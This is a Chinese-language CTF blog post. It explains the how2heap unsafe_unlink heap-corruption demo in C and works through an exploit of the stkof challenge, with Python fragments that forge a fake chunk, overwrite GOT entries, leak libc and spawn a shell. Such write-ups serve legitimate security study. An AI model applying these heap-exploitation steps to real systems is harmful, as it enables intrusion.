<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Gemini","version":"7.7.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="how2heap - unsafe_unlink&amp;stkof、Wheel of Robots环境：ubuntu16.04 libc2.23 unsafe_unlink.c:12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596">
<meta property="og:type" content="article">
<meta property="og:title" content="how2heap - unsafe_unlink&amp;stkof、Wheel of Robots">
<meta property="og:url" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/index.html">
<meta property="og:site_name" content="Coldshiel&#39;s blog">
<meta property="og:description" content="how2heap - unsafe_unlink&amp;stkof、Wheel of Robots环境：ubuntu16.04 libc2.23 unsafe_unlink.c:12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580548299890.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580560743117.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580559836335.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580559935789.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580560078101.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580560247354.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580560405002.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580563261399.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580563976215.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580564233828.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580573062290.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580573416563.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580573549034.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580573753819.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580574045235.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580574275281.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580574445414.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580574577079.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580575014595.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580575136615.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580639554736.png">
<meta property="og:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580640134364.png">
<meta property="article:published_time" content="2020-02-03T07:30:16.000Z">
<meta property="article:modified_time" content="2020-02-29T10:09:07.033Z">
<meta property="article:author" content="Coldshield">
<meta property="article:tag" content="how2heap">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580548299890.png">

<link rel="canonical" href="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true
  };
</script>

  <title>how2heap - unsafe_unlink&stkof、Wheel of Robots | Coldshiel's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Coldshiel's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshiel's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          how2heap - unsafe_unlink&stkof、Wheel of Robots
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-02-02 23:30:16" itemprop="dateCreated datePublished" datetime="2020-02-02T23:30:16-08:00">2020-02-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-02-29 02:09:07" itemprop="dateModified" datetime="2020-02-29T02:09:07-08:00">2020-02-29</time>
              </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="how2heap-unsafe-unlink-amp-stkof、Wheel-of-Robots"><a href="#how2heap-unsafe-unlink-amp-stkof、Wheel-of-Robots" class="headerlink" title="how2heap - unsafe_unlink&amp;stkof、Wheel of Robots"></a>how2heap - unsafe_unlink&amp;stkof、Wheel of Robots</h1><p>环境：ubuntu16.04 libc2.23</p>
<h2 id="unsafe-unlink-c"><a href="#unsafe-unlink-c" class="headerlink" title="unsafe_unlink.c:"></a>unsafe_unlink.c:</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdint.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">uint64_t</span> *chunk0_ptr;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Welcome to unsafe unlink 2.0!\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Tested in Ubuntu 14.04/16.04 64bit.\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n"</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">int</span> malloc_size = <span class="number">0x80</span>; <span class="comment">//we want to be big enough not to use fastbins</span></span><br><span class="line">	<span class="keyword">int</span> header_size = <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n"</span>);</span><br><span class="line"></span><br><span class="line">	chunk0_ptr = (<span class="keyword">uint64_t</span>*) <span class="built_in">malloc</span>(malloc_size); <span class="comment">//chunk0</span></span><br><span class="line">	<span class="keyword">uint64_t</span> *chunk1_ptr  = (<span class="keyword">uint64_t</span>*) <span class="built_in">malloc</span>(malloc_size); <span class="comment">//chunk1</span></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"The global chunk0_ptr is at %p, pointing to %p\n"</span>, &amp;chunk0_ptr, chunk0_ptr);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"The victim chunk we are going to corrupt is at %p\n\n"</span>, chunk1_ptr);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"We create a fake chunk inside chunk0.\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;fd-&gt;bk = P.\n"</span>);</span><br><span class="line">	chunk0_ptr[<span class="number">2</span>] = (<span class="keyword">uint64_t</span>) &amp;chunk0_ptr-(<span class="keyword">sizeof</span>(<span class="keyword">uint64_t</span>)*<span class="number">3</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;bk-&gt;fd = P.\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"With this setup we can pass this check: (P-&gt;fd-&gt;bk != P || P-&gt;bk-&gt;fd != P) == False\n"</span>);</span><br><span class="line">	chunk0_ptr[<span class="number">3</span>] = (<span class="keyword">uint64_t</span>) &amp;chunk0_ptr-(<span class="keyword">sizeof</span>(<span class="keyword">uint64_t</span>)*<span class="number">2</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Fake chunk fd: %p\n"</span>,(<span class="keyword">void</span>*) chunk0_ptr[<span class="number">2</span>]);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Fake chunk bk: %p\n\n"</span>,(<span class="keyword">void</span>*) chunk0_ptr[<span class="number">3</span>]);</span><br><span class="line"></span><br><span class="line">	<span class="comment">//fprintf(stderr, "We need to make sure the 'size' of our fake chunk matches the 'previous_size' of the next chunk (chunk+size)\n");</span></span><br><span class="line">	<span class="comment">//fprintf(stderr, "With this setup we can pass this check: (chunksize(P) != prev_size (next_chunk(P)) == False\n");</span></span><br><span class="line">	<span class="comment">//fprintf(stderr, "P = chunk0_ptr, next_chunk(P) == (mchunkptr) (((char *) (p)) + chunksize (p)) == chunk0_ptr + (chunk0_ptr[1]&amp;(~ 0x7))\n");</span></span><br><span class="line">	<span class="comment">//fprintf(stderr, "If x = chunk0_ptr[1] &amp; (~ 0x7), that is x = *(chunk0_ptr + x).\n");</span></span><br><span class="line">	<span class="comment">//fprintf(stderr, "We just need to set the *(chunk0_ptr + x) = x, so we can pass the check\n");</span></span><br><span class="line">	<span class="comment">//fprintf(stderr, "1.Now the x = chunk0_ptr[1]&amp;(~0x7) = 0, we should set the *(chunk0_ptr + 0) = 0, in other words we should do nothing\n");</span></span><br><span class="line">	<span class="comment">//fprintf(stderr, "2.Further more we set chunk0_ptr = 0x8 in 64-bits environment, then *(chunk0_ptr + 0x8) == chunk0_ptr[1], it's fine to pass\n");</span></span><br><span class="line">	<span class="comment">//fprintf(stderr, "3.Finally we can also set chunk0_ptr[1] = x in 64-bits env, and set *(chunk0_ptr+x)=x,for example chunk_ptr0[1] = 0x20, chunk_ptr0[4] = 0x20\n");</span></span><br><span class="line">	<span class="comment">//chunk0_ptr[1] = sizeof(size_t);</span></span><br><span class="line">	<span class="comment">//fprintf(stderr, "In this case we set the 'size' of our fake chunk so that chunk0_ptr + size (%p) == chunk0_ptr-&gt;size (%p)\n", ((char *)chunk0_ptr + chunk0_ptr[1]), &amp;chunk0_ptr[1]);</span></span><br><span class="line">	<span class="comment">//fprintf(stderr, "You can find the commitdiff of this check at https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30\n\n");</span></span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n"</span>);</span><br><span class="line">	<span class="keyword">uint64_t</span> *chunk1_hdr = chunk1_ptr - header_size;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n"</span>);</span><br><span class="line">	chunk1_hdr[<span class="number">0</span>] = malloc_size;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x90, however this is its new value: %p\n"</span>,(<span class="keyword">void</span>*)chunk1_hdr[<span class="number">0</span>]);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n\n"</span>);</span><br><span class="line">	chunk1_hdr[<span class="number">1</span>] &amp;= ~<span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n"</span>);</span><br><span class="line">	<span class="built_in">free</span>(chunk1_ptr);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n"</span>);</span><br><span class="line">	<span class="keyword">char</span> victim_string[<span class="number">8</span>];</span><br><span class="line">	<span class="built_in">strcpy</span>(victim_string,<span class="string">"Hello!~"</span>);</span><br><span class="line">	chunk0_ptr[<span class="number">3</span>] = (<span class="keyword">uint64_t</span>) victim_string;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Original value: %s\n"</span>,victim_string);</span><br><span class="line">	chunk0_ptr[<span class="number">0</span>] = <span class="number">0x4141414142424242</span>LL;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"New Value: %s\n"</span>,victim_string);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这段的原理在前面SleepyHolder其实已经用过了，所以就只简单的debug，帮助自己记忆一下</p>
<p>Debug:</p>
<p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580548299890.png" alt="1580548299890"></p>
<p>更改 chunk 1 prev_inuse之前所伪造的fake chunk，fake chunk-&gt;fd被设置成&amp;chunk0_ptr-0x18，fake chunk-&gt;bk被设置成&amp;chunk0_ptr-0x10，然后prev_size设置成chunk 0 size-0x10（减去chunk head大小，就是我们malloc传入参数的大小0x80）</p>
<p>之后修改chunk 1的prev_inuse位为0，free chunk 1&amp;trigger <code>unlink(chunk0)</code>，通过unlink的检查、操作之后，所得到的结果是chunk0_ptr=0x602058(fake fd)</p>
<p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580560743117.png" alt="1580560743117"></p>
<p>此时chunk0_ptr[3]刚好为chunk0_ptr，填入victim_string的地址，然后对其进行修改</p>
<p>具体步骤回顾前一篇写的unlink过程，不再做多解释</p>
<h1 id="stkof"><a href="#stkof" class="headerlink" title="stkof"></a>stkof</h1><h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><p>程序一共有四个功能供选择，执行成功输出OK，执行失败输出FAIL</p>
<p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580559836335.png" alt="1580559836335"></p>
<h3 id="new"><a href="#new" class="headerlink" title="new:"></a>new:</h3><p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580559935789.png" alt="1580559935789"></p>
<p>malloc一个没有大小检查的chunk，放入s数组记录，并输出对应index，malloc时对应index只增不减</p>
<h3 id="fill-chunk"><a href="#fill-chunk" class="headerlink" title="fill_chunk:"></a>fill_chunk:</h3><p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580560078101.png" alt="1580560078101"></p>
<p>输入index后检查index大小、以及对应index是否有记录chunk，然后输入想要fill的大小，这里对大小没有检查，存在overflow</p>
<h3 id="Free："><a href="#Free：" class="headerlink" title="Free："></a>Free：</h3><p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580560247354.png" alt="1580560247354"></p>
<p>输入index，检查index大小、以及对应index是否 有记录，然后free 对应的chunk，并清除记录</p>
<h3 id="todo"><a href="#todo" class="headerlink" title="todo:"></a>todo:</h3><p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580560405002.png" alt="1580560405002"></p>
<p>似乎没什么用…（但是在后面的利用用到了）</p>
<h2 id="Exploit："><a href="#Exploit：" class="headerlink" title="Exploit："></a>Exploit：</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 1</span></span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 2 </span></span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 3</span></span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 4</span></span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 5 unlink chunk</span></span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 6 chunk to free</span></span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 7 Avoid merging</span></span><br></pre></td></tr></table></figure>

<p>首先new出7个small chunk，此时记录如图所示</p>
<p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580563261399.png" alt="1580563261399"></p>
<p>利用fill_chunk和chunk 5修改chunk 6 的prev_inuse位，顺带构造一个fake chunk</p>
<p><em>（这里为什么不从chunk1开始主要是因为在调试时发现chunk 1的前后分别有一个size为1040的chunk，具体原因参考ctf-wiki  <a href="https://wiki.x10sec.org/pwn/heap/unlink/#2014-hitcon-stkof）" target="_blank" rel="noopener">https://wiki.x10sec.org/pwn/heap/unlink/#2014-hitcon-stkof）</a></em></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">chunk5_address=<span class="number">0x602168</span></span><br><span class="line">fake_chunk  = p64(<span class="number">0</span>)+p64(<span class="number">0x81</span>)<span class="comment">#fake chunk head</span></span><br><span class="line">fake_chunk += p64(chunk5_address<span class="number">-0x18</span>)+p64(chunk5_address<span class="number">-0x10</span>)<span class="comment">#fake fd/bk</span></span><br><span class="line">fake_chunk += <span class="string">'\x00'</span>*(<span class="number">0x80</span>-len(fake_chunk))</span><br><span class="line">fake_chunk += p64(<span class="number">0x80</span>)+<span class="string">'\x90'</span><span class="comment">#fake prev_size,prev_inuse</span></span><br><span class="line">fill_chunk(<span class="number">5</span>,len(fake_chunk),fake_chunk)</span><br></pre></td></tr></table></figure>

<p>fill之后：</p>
<p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580563976215.png" alt="1580563976215"></p>
<p>之后free chunk 6，第5个chunk用来unlink，这个操作设置其内容为&amp;chunk2</p>
<p>执行free之后（这个截图是还没执行到s[6]=0处）：</p>
<p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580564233828.png" alt="1580564233828"></p>
<p>接着利用其修改index 2处的记录为&amp;strlen_GOT，然后使用fill_chunk(2)修改strlen_GOT的值为&amp;puts_plt</p>
<p>修改index 2处的记录为&amp;puts_GOT</p>
<p>接着调用todo，输入2即可puts(&amp;strlen_GOT)，接着根据strlen在libc的偏移计算出libc base</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">strlen_GOT=<span class="number">0x602030</span></span><br><span class="line">puts_GOT=<span class="number">0x602020</span></span><br><span class="line">puts_plt=<span class="number">0x400760</span></span><br><span class="line">fill_chunk(<span class="number">5</span>,<span class="number">8</span>,p64(strlen_GOT)) <span class="comment">#index 2-&gt;strlen_GOT address</span></span><br><span class="line">fill_chunk(<span class="number">2</span>,<span class="number">8</span>,p64(puts_plt))<span class="comment">#set strlen_GOT -&gt; puts_plt </span></span><br><span class="line">fill_chunk(<span class="number">5</span>,<span class="number">8</span>,p64(puts_GOT))<span class="comment">#index 2-&gt;puts_GOT address</span></span><br><span class="line">todo(<span class="number">2</span>)<span class="comment">#puts(&amp;puts_GOT)</span></span><br><span class="line">libc_base=my_u64(p.recv(<span class="number">6</span>))<span class="number">-0x6f690</span></span><br></pre></td></tr></table></figure>

<p>同样利用上面的方式，fill chunk 3为/bin/sh，然后将strlen_GOT设置成system的地址，todo(3)即可getshell</p>
